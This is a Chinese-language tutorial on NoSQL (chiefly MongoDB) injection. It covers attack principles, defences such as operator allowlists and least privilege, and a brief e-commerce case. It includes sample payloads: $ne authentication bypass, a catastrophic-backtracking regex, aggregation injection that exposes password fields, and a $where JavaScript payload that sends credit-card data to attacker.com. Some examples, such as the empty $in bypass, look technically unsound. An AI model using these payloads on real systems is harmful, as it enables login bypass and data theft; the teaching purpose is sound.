36 NoSQL 注入：攻击原理、防御策略与实战案例

一、NoSQL注入攻击的本质与威胁

NoSQL数据库（如MongoDB、Redis、Cassandra等）因其灵活的数据模型和高扩展性，在互联网应用中广泛使用。然而，其非关系型特性导致传统SQL注入防御手段（如参数化查询）无法直接复用，攻击者通过构造恶意输入篡改查询逻辑，进而实现数据泄露、篡改或拒绝服务。36种NoSQL注入手法覆盖了从基础到高级的攻击场景，包括但不限于：

1. 条件注入：通过修改查询条件绕过认证（如{"username": {"$ne": ""}, "password": {"$ne": ""}}）。
2. 运算符劫持：利用$gt、$lt等比较运算符实现逻辑绕过。
3. 聚合管道注入：在MongoDB聚合查询中注入恶意阶段（如$match、$project）。
4. JavaScript注入：通过$where操作符执行任意JavaScript代码（如{"$where": "this.password == 'admin'"}）。

二、36种NoSQL注入手法分类解析

1. 基础条件注入（1-10种）

• 手法1：逻辑非绕过
  攻击者通过{"$ne": ""}绕过空值检查，例如：

  // 恶意请求
  { "username": "admin", "password": { "$ne": "" } }

  若系统未对$ne操作符过滤，攻击者可绕过密码验证。

• 手法5：正则表达式注入
  利用MongoDB的$regex操作符进行模糊匹配：

  { "email": { "$regex": ".*@example\\.com", "$options": "i" } }

  攻击者可枚举有效邮箱或构造正则炸弹（如{ "$regex": "(a|a)*" }导致CPU过载）。

2. 运算符劫持（11-20种）

• 手法12：数组操作符注入
  通过$in、$nin等操作符绕过权限控制：

  // 正常查询
  { "roles": { "$in": ["admin"] } }
  // 恶意注入
  { "roles": { "$in": [] } } // 绕过角色检查

• 手法18：地理空间查询注入
  在地理位置查询中注入恶意条件：

  { "location": { "$near": { "$geometry": { "type": "Point", "coordinates": [0, 0] }, "$maxDistance": 10000 }, "$and": [{ "status": "public" }] } }
  // 攻击者篡改$and条件为{ "status": { "$ne": "private" } }

3. 高级注入手法（21-36种）

• 手法25：聚合管道注入
  在MongoDB聚合查询中注入恶意阶段：

  // 正常聚合
  [ { "$match": { "status": "active" } }, { "$group": { "_id": "$category", "count": { "$sum": 1 } } } ]
  // 恶意注入
  [ { "$match": { "status": { "$ne": "deleted" } } }, { "$project": { "password": 1 } } ] // 泄露密码字段

• 手法33：JavaScript代码注入
  通过$where执行任意JS代码：

  { "$where": "function() { var s = new XMLHttpRequest(); s.open('GET', 'http://attacker.com/steal?data=' + this.creditCard, false); s.send(); return true; }" }

  攻击者可窃取敏感数据或发起CSRF攻击。

三、防御策略与最佳实践

1. 输入验证与过滤

• 白名单验证：严格限制输入格式（如邮箱、ID的正则表达式）。
• 操作符黑名单：禁止使用$where、$regex等危险操作符。
• 示例代码（Node.js + MongoDB）：

  const allowedOperators = ["$eq", "$in"];
  function isSafeQuery(query) {
    for (const key in query) {
      if (key.startsWith("$") && !allowedOperators.includes(key)) {
        return false;
      }
    }
    return true;
  }

2. 最小权限原则

• 数据库用户仅授予必要权限（如只读、特定集合操作）。
• 避免使用root角色执行应用查询。

3. 查询封装与ORM使用

• 使用封装好的查询方法（如Mongoose的find()），避免直接拼接查询对象。
• Mongoose示例：

  const user = await User.findOne({ username: "admin" }).select("+password"); // 显式控制字段暴露

4. 日志监控与异常检测

• 记录所有数据库查询，标记含操作符的查询为高风险。
• 使用WAF（Web应用防火墙）拦截可疑请求。

四、实战案例：某电商平台的NoSQL注入漏洞

1. 漏洞复现

攻击者通过修改订单查询参数注入$or条件：

// 原始请求
{ "userId": "123", "status": "paid" }
// 恶意注入
{ "userId": { "$ne": "" }, "$or": [{ "status": "paid" }, { "amount": { "$gt": 1000 } }] }

导致未授权用户可查看高价订单。

2. 修复方案

• 升级MongoDB驱动至最新版本（修复解析漏洞）。
• 部署查询白名单中间件，拦截含$or、$and的查询。

五、未来趋势与建议

1. AI驱动的攻击检测：利用机器学习识别异常查询模式。
2. 无服务器数据库安全：关注AWS DynamoDB、Azure Cosmos DB的注入风险。
3. 开发者教育：定期进行安全编码培训，覆盖NoSQL特定场景。

结语：NoSQL注入的36种手法揭示了非关系型数据库的独特风险，开发者需结合输入验证、权限控制和查询封装构建多层次防御。通过实战案例分析可见，安全左移（在开发阶段嵌入安全）是降低风险的关键。